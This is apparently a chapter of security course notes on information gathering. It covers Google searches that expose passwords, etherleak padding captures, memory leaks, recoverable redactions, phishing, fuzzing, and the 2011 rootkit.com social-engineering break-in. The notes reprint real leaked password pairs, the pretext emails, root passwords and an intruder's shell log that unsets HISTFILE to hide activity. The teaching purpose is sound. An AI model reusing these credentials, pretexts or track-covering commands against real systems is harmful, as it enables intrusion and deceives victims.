On 24 Oct 1992 a Reuters reporter found and published the not-yet-released Q3 financial results of the Swedish company Intentia. The results were disappointing, and share price dropped 23%. The company was very angry and sued Reuters. Intentia: The report was not linked to through any public means. Reuters: The material was freely available on Intentia's site for anyone who wanted to look at it. Three months later, the case was dismissed. [ Wired, ITworld. the URL, case dismissed.]

On 27 Apr 2004 the winner of the "Libris Literatuurprijs" was revealed a few hours before the official announcement. See webwereld.

A search machine

Google will find all kinds of interesting stuff.

Config files and error messages Some error messages are very revealing, they may give user names, file pathnames, fragments of PHP or SQL code etc. Use Google to search for revealing error messages: ihackstuff. One can even find password files.

URLs Some incompetent programmers handle login via a GET, so that one gets URLs that contain username and password. In the case of the French newspaper Le Figaro the flaw was more complicated, but the result the same. For example, let me ask Google for inurl:figaro_commentaires_password. Today this yields URLs like

http://plus.lefigaro.fr/articlesdv/20120704ARTFIG00694/commentaires?page=3&comment= ... &form_build_id=form-26cf91a795a0586906b642a2f0f53a56
&form_id=comment_form&figaro_commentaires_email=christag%40orange.fr&figaro_commentaires_password=DAC500&op=Valider
and hence (username,password) pairs like
[email protected]:251156
[email protected]:DAC500
[email protected]:jaguar61
[email protected]:asbmfc
[email protected]:Dpmat*21
[email protected]:reseda
[email protected]:La.vache.6419

nessus

Programs like nmap may tell one what kind of remote system one is dealing with, and what ports are open. The hacker then needs to know what kinds of exploits exist for such a setup. The program nessus tests a battery of known vulnerabilities, and comes with a detailed report.

paros

Paros is a webproxy, that allows you to see what webpages/websites do, and to modify what they do. It has a built-in scanner that tests for common vulnerabilities and comes with a report.

burp

Burp is a tool for probing web applications.

3.2 Information leaks

There are some systematic ways to probe for small amounts of data. On a local machine one can use malloc() or some function that has a buffer that is larger than the amount of data returned, where the rest of the buffer contains "old garbage". Such remains from other programs may contain valuable information.

Etherleak

The ethernet standard requires packets to have a length of at least 46 bytes (60 bytes together with ethernet header). Smaller packets are padded. For example, a ping -s 1 sends 29-byte packets, and 17 bytes of padding are added. (Similarly, ARP packets are padded with 18 bytes.) The standard says that the padding should be zero, but many flawed implementations use random content. This content may be what happened to be in some OS buffer, or in the device driver buffer, or in the hardware ethernet card transmit buffer. Thus, a ping to a machine on the same ethernet may leak information, probably about recently transmitted packets, maybe arbitrary memory content.

Let me try. (Do ping -s 1 target and capture replies.)

# tethereal -V -a duration:5 ip proto \\icmp | grep Trailer | uniq
Trailer: DECC808010F6482A5000000101080A0F...
Trailer: 000194E15500006B114215DBEB262250...
Trailer: 1BD58850112000172A000005A0320A89...
Trailer: 1A49E550182000E31500003C4D455441...
Trailer: 5FC14150112000D30B000005A0320A89...
Trailer: 699ADA501120005953000005A0320A89...
Trailer: EC291A501120004E75000005A0320A89...
Trailer: D08BD950182000A72F00003C48544D4C...
Trailer: 9DD534501120001A90000005A0320A89...
Trailer: 780A66501120009860000005A0320A89...
Trailer: 931DE250112000F0B1000005A0320A89...
Trailer: 5D103F50102000380C00003C2F48544D...
Trailer: C05C1650112000123B000005A0320A89...
Trailer: 14BE2750182000311400003C2F464F4E...
Trailer: E02B6350112000A2B8000005A0320A89...
Trailer: 1BFBDC501120001AF2000005A0320A89...
Trailer: 04987D7012200083B900000204020001...
Trailer: A17A4B501820003DEC000053594E4320...
Trailer: 6879C050182000ABCB00003C54523E0A...
Trailer: B1DC6550112000E1AB000005A0320A89...
Trailer: A468FD501120009D0F000005A0320A89...
Trailer: 8BAD9250102000921400003C4652414D...
Trailer: D9CC165011200099AB000005A0320A89...
Trailer: 2CE0C950112000CC93000005A0320A89...
What data could this be? Close inspection reveals this to be mostly HTTP packet fragments. (For the last line: 2CE0C9: last three bytes of ACK number, 50: header length 5*4 bytes, 11: flags FIN ACK, 2000: window size, CC93: checksum, 0000: urgent pointer, 05A0320A89: start of the data. At this data position we see in earlier lines 3C4D455441: <META, and 3C48544D4C: <HTML, and 3C2F48544D: </HTM, and 3C2F464F4E: </FON, and 53594E4320: SYNC , and 3C54523E0A: <TR>\n, and 3C4652414D: <FRAM..) No passwords today, but the principle works.

Is this serious? If the data is only from the local LAN it could have been sniffed anyway. If this is OS memory then arbitrary data may be exposed. If switches do forward an entire packet, then this trailer stuff might survive and the leaked data can come from a remote machine. The presence of etherleak helps a little bit in fingerprinting: only the older systems suffer from etherleak.

My cablemodem suffers from etherleak, and the data captured is sometimes from local traffic and sometimes not. Thus, it seems to come from OS memory. Some upstream data leaks. A small test yields upstream text fragments like NOTIFY * HTTP/1., KaZaA, fileshare, DHCPC , My Request, <?xml version="1, PING, PNG\r, OUT\r, GET , POST, QUIT, show, quit, infostring, getinfo xxx, icmcfg.bin, [email protected], *hAqisL0c, Ch0OcHUtr, 8Fbal Moz, CKA, HBN1, roken.T, REPORT , AcTiOn192.168.0., PathContrl, \status\.

Exercise What are these? For example, CKA is from a SMB Name Wildcard request.

Exercise What are the best packets to send? Is it possible to get more than 18 bytes padding?

Memory leak

In many cases it is possible to obtain uninitialized memory that still contains whatever happened to be there.

In August 2004 a Linux kernel vulnerability was found that allowed one to read page-sized fragments of kernel data. The announcement (with exploit). The exploit uses a race condition.

Sometimes one finds passwords this way. In 1982 I showed someone how it was possible to read the Unix input queue for any terminal, and at that same moment root (Teus Hagen) logged in. Google can still find the original exploit by Khron The Elder - search groups for static char *sccsid="brog.c KtE (aka Rehmi) U of Mud Sep. 11 1982";. (Getting at kernel memory was easy: it had universal read permission since ps got its info by reading /dev/kmem, so the work mainly consisted in finding the right place to read.)

Redacted text

Often people redact text in a document to be published in a way that allows the text to be recovered. Maybe the document format has a version history built-in, and one only has to find the previous version. Or maybe the text was blacked out by changing the background color to black. Now one only has to change the background color again (or to copy and paste the text).

A 2011 example: The British Ministry of Defence had to publish parts of a report on nuclear submarines following a freedom of information request. They blacked out the sensitive parts, but copy and paste sufficed to read this text again. Oops. As soon as they found out the flaw was corrected, but the previous version can still be found in Google cache: Blacked out pdf, Google cache.

Phishing

There are more active ways of obtaining the desired information. Get people so far that they supply it. Social engineering (invent a plausible story, and make a telephone call). Or visual engineering (create a screen that is not easily distinguished from the authentic one, and asks for information - maybe a login screen for a local computer session, or a web login screen, maybe for online banking). For example, below a spoof of the login screen for Postbank Internet Bankieren. A report on phishing techniques.

3.3 Flaw discovery

Many exploits rely on program flaws, often errors that cause unchecked user data to be used. One can search for specific bug patterns, or audit the source or disassembly listing of specific programs. A third approach, which does not require previous acquaintance with the type of bug, and which can be automated is fuzzing. Fuzzing is the technique where you feed programs of interest with random input data and present them with a random environment. As soon as the program under consideration can be crashed, the circumstances of the crash are investigated - maybe there is a vulnerability.

3.4 Social engineering attack

The most powerful of all attacks. Find a good story and have people help you to get in. People will happily change passwords, open up firewalls etc. in order to help others. Here a famous example (Feb. 2011). Step 1 was getting into Greg Hoglands email account, reading some old mail:

Date: Thu, 6 Jan 2011 10:47:29 -0800
From: Greg Hoglund <[email protected]>
To: jussi <[email protected]>, jussi jaakonaho <[email protected]>
Subject: need password for rootkit like fast

jussi, shawn is headed to data center today can you send me the
password I will have shawn change it from the console straight away

Date: Thu, 6 Jan 2011 20:51:37 +0200
From: jussi jaakonaho <[email protected]>
To: Greg Hoglund <[email protected]>
Subject: Re: need password for rootkit like fast

i think changed that to 88j4bb3rw0cky88

if that does not work then 88Scr3am3r88 (long time since used those
anyways)

if he has time then single user mode could be used.

he just needs to disable iptables, or remove rc.firewall from init.d,
could also do warm boot as last boots have been cold ones - might not be
good for filesysttem consistency. i can do boot remotely though also
when getting access back.

_jussi

and sending some new mail:

From: Greg Hoglund <[email protected]> Sun, Feb 6, 2011 at 8:59 PM
To: jussi <[email protected]>

im in europe and need to ssh into the server. can you drop open up
firewall and allow ssh through port 59022 or something vague?
and is our root password still 88j4bb3rw0cky88 or did we change to
88Scr3am3r88 ?
thanks

From: jussi jaakonaho <[email protected]> Sun, Feb 6, 2011 at 9:06 PM
To: Greg Hoglund <[email protected]>

hi, do you have public ip? or should i just drop fw?
and it is w0cky - tho no remote root access allowed

From: Greg Hoglund <[email protected]> Sun, Feb 6, 2011 at 9:08 PM
To: jussi jaakonaho <[email protected]>

no i dont have the public ip with me at the moment because im ready
for a small meeting and im in a rush.
if anything just reset my password to changeme123 and give me public
ip and ill ssh in and reset my pw.

From: jussi jaakonaho <[email protected]> Sun, Feb 6, 2011 at 9:10 PM
To: Greg Hoglund <[email protected]>

ok, takes couple mins, i will mail you when ready. ssh runs on 47152

From: jussi jaakonaho <[email protected]>
To: Greg Hoglund <[email protected]>

ok, it should now accept from anywhere to 47152 as ssh. i am doing
testing so that it works for sure. your password is changeme123
i am online so just shoot me if you need something.
in europe, but not in finland? :-)

From: Greg Hoglund <[email protected]> Sun, Feb 6, 2011 at 9:17 PM
To: jussi jaakonaho <[email protected]>

if i can squeeze out time maybe we can catch up.. ill be in germany
for a little bit.

anyway I can't ssh into rootkit. you sure the ips still 65.74.181.141?

From: jussi jaakonaho <[email protected]>

does it work now?

From: Greg Hoglund <[email protected]> Sun, Feb 6, 2011, at 9:23 PM

yes jussi thanks

did you reset the user greg or?

From: jussi jaakonaho <[email protected]>

nope. your account is named as hoglund

From: Greg Hoglund <[email protected]> Sun, Feb 6, 2011, at 9:26 PM

yup im logged in thanks ill email you in a few, im backed up
thanks

And indeed:

bash-3.2# ssh [email protected] -p 47152
[unauthorized access prohibited]
[email protected]'s password:
[[email protected] hoglund]$ unset
[email protected] hoglund]$ w
11:23:50  up 30 days,  5:45,  4 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
jussi    pts/0    cs145060.pp.htv. Wed11pm 59.00s  0.38s  0.35s  screen -r
jussi    pts/1    -                Thu 5am  1:13   0.38s  4.90s  SCREEN
jussi    pts/2    -                Thu 5am 59.00s  0.68s  4.90s  SCREEN
hoglund  pts/3    132.181.74.65.st 11:23am  0.00s  0.03s  0.00s  w
[[email protected] hoglund]$ unset HIST
[[email protected] hoglund]$ unset HISTFLE
[[email protected] hoglund]$ unset HISTFILE
[[email protected] hoglund]$ uname -a;hostname
Linux www.rootkit.com 2.4.21-40.ELsmp #1 SMP Wed Mar 15 14:21:45 EST 2006 i686 i686 i386 GNU/Linux
www.rootkit.com
[[email protected] hoglund]$ su -
Password:
[[email protected] root]# unset HIST
[[email protected] root]# unset HISTFILE
[[email protected] root]# uname -a;hostname;id
Linux www.rootkit.com 2.4.21-40.ELsmp #1 SMP Wed Mar 15 14:21:45 EST 2006 i686 i686 i386 GNU/Linux
www.rootkit.com
uid=0(root) gid=0(root) groups=0(root),1200(varmistus)


Next Previous Contents